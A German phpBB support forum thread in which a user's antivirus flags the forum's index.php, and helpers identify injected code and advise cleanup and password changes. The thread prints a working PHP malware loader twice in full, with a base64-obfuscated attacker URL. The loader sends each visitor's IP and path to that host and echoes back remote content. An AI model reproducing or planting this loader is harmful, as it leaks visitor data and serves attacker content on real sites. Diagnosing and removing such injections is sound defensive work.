Virus in Index.php

[Mille1404]

Nachdem ich das Update zu 3.0.10 nun installiert habe wollte ich eine Sicherung der FTP Servers anlegen.

Nun erkennt Antivir direkt einen Virus (Maleware) in der Datei /forum/index.php und benennt ihn mit PHP/Botloader.B

Ist das Problem bekannt? Ich konnte via google leider keinen Hinweis finden. Wie bekomme ich den denn wieder weg?

Da ich nicht der allerbeste bin in PHP frage ich mich, ob ich evtl. eine neue index.php aufspielen kann, oder ob es dann zu Problemen kommt?
Ich weiss ja nicht wie viel das Forum da hineinschreibt oder oben nicht?

Danke schonmal für die nächste Hilfe!
Gruß
Marcel

[Mahony]

Hallo
Siehe dazu KB:gehackt

Grüße: Mahony

[Helmut]

Hallo Mille1404,

klar kannst du einfach eine neue index.php einspielen wenn die alte Datei nicht durch Mods angepasst wurde. In dem Fall müsstest du die Änderungen halt nochmal rein machen.


Schaue dir doch mal den Code der besagten index.php an, ob da irgendwas nach ?> steht, da darf normal nix kommen. Kannst ja mal die Datei im https://www.phpbb.de/support/pastebin.php einstellen.

Gruß Helmut

[Mille1404]

Ja da war mal was hinter dem ?> von einem Googlebot.
Das habe ich schon entfernt.

Ich habe die Datei mal online gestellt in diesem Portal.
Hier ist der Link:

https://www.phpbb.de/support/pastebin.p ... view&s=916

Ich hoffe es ist nur eine kleinigkeit!

Viele Grüße und Danke!

[Helmut]

Hallo Mille1404,

der Teil gehört auf alle Fälle nicht zu phpBB dazu und auch nicht in die index.php rein:

Code: Alles auswählen

<?
 
if (!isset($sRetry))
 
{
 
global $sRetry;
 
$sRetry = 1;
 
    // This code use for global bot statistic
 
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
 
    $stCurlHandle = NULL;
 
    $stCurlLink = "";
 
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
 
    {
 
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
 
        $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
 
            $stCurlHandle = curl_init( $stCurlLink );
 
    }
 
    }
 
if ( $stCurlHandle !== NULL )
 
{
 
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
 
    $sResult = @curl_exec($stCurlHandle);
 
    if ($sResult[0]=="O")
 
     {$sResult[0]=" ";
 
      echo $sResult; // Statistic code end
 
      }
 
    curl_close($stCurlHandle);
 
}
 
}
 
?>

Hast du was von Google verbaut, sieht etwas nach Googlestatistics .... aus?

Gruß Helmut

[Mahony]

Hallo
Dieser Code

Code: Alles auswählen

<?

if (!isset($sRetry))

{

global $sRetry;

$sRetry = 1;

    // This code use for global bot statistic

    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot

    $stCurlHandle = NULL;

    $stCurlLink = "";

    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes

    {

        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           

        $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);

            $stCurlHandle = curl_init( $stCurlLink );

    }

    }

if ( $stCurlHandle !== NULL )

{

    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);

    $sResult = @curl_exec($stCurlHandle);

    if ($sResult[0]=="O")

     {$sResult[0]=" ";

      echo $sResult; // Statistic code end

      }

    curl_close($stCurlHandle);

}

}

?>

stammt von einem Virus bzw. Malware.
Du solltest also gemäß KB:gehackt vorgehen.

P.S. Den Rechner zuerst zu säubern dürfte wohl klar sein.


Grüße: Mahony

[Mille1404]

Wunderbar.

Nun klappt wieder alles ohne Probleme und es ist wieder alles Maleware frei..

Zum Thema "Mein Forum wurde gehakt..."
Das Problem war bekannt und behoben.
Dadurch hatte ich ja überhaupt die weiteren Probleme.

Um das ganze wieder hinzubiegen musste ich nun einiges Tun.
Passwörter und co sind alle geändert und auch das andere ist alles erledigt.
Nun ist wieder alles auf einem gescheiten Stand.

Ich denke, dass war nur noch ein überbleibsel, welches Ich übersehen oder vergessen habe.

Vielen vielen Dank nochmals an alle für die Hilfe!

[Tina-]

Wunderbar.

Nun klappt wieder alles ohne Probleme und es ist wieder alles Maleware frei.. [...]

Hallo,

hast Du denn das Board neu installiert und die Sicherheitslücke gefunden - also wie sie überhaupt reinkamen? (Über eine Erweiterung /Modifikation vielleicht)?

[...]
Das Problem war bekannt und behoben.
Dadurch hatte ich ja überhaupt die weiteren Probleme.

Wie meinst Du das?



LG Tina

[hackepeter13]

Wunderbar.

Nun klappt wieder alles ohne Probleme und es ist wieder alles Maleware frei.. [...]

Hallo,

hast Du denn das Board neu installiert und die Sicherheitslücke gefunden - also wie sie überhaupt reinkamen? (Über eine Erweiterung /Modifikation vielleicht)?

Es muss nicht durch eine Mod gewesen sein.
Wenn dein PC mit einer bestimmten Malware infiziert ist, kann es passieren, das phpBB3 Dateien auf dem PC nach dem entpacken und vor dem Hoachladen davon mit infiziert werden, übernimmt man die infizierte Datei mit auf den Webspace und das führt dann beim Aufrufen der Seite eben zu einer Virenmeldung.

Deswegen hat Mahony auch geschrieben, das er sein PS vorher säubern sollte.

[Tina-]

Es muss nicht durch eine Mod gewesen sein.

Ja, korrekt.... es könnte auch FTP sein.


EDIT:

Wenn Du willst kann Du ja hier mal schauen.
(FTP - gehackt / Hack erfolgte über das Netzwerk des Rechenzentrums)